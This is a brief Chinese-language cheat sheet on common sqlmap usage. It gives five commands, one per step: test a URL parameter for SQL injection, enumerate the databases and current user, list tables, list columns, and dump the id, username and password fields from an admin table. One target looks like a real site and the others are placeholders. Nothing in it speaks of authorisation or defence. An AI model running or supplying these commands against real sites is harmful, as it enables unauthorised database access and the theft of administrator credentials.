SQLMAP注入常见用法

 

1.检查注入点

sqlmap -u http://www.com.tw/star_photo.php?artist_id=11

 

2.列数据库信息当前用户和数据库

sqlmap -u http://www.xxxx.com/getcustomer.asp?q=1 --dbs --current-user --current-db

 

 

3.指定库名列出所有表

sqlmap -u http://www.xxxx.com/getcustomer.asp?q=1 -D xxxSQL --tables

 

4.指定库名表名列出所有字段

sqlmap -u http://www.xxxx.com/getcustomer.asp?q=1 -D xxxSQL  -T DB_admin --columns

 

5.指定库名表名字段dump出指定字段

sqlmap -u http://www.xxxx.com/getcustomer.asp?q=1 -D xxxSQL  -T admin -C id,,username,userpws --dump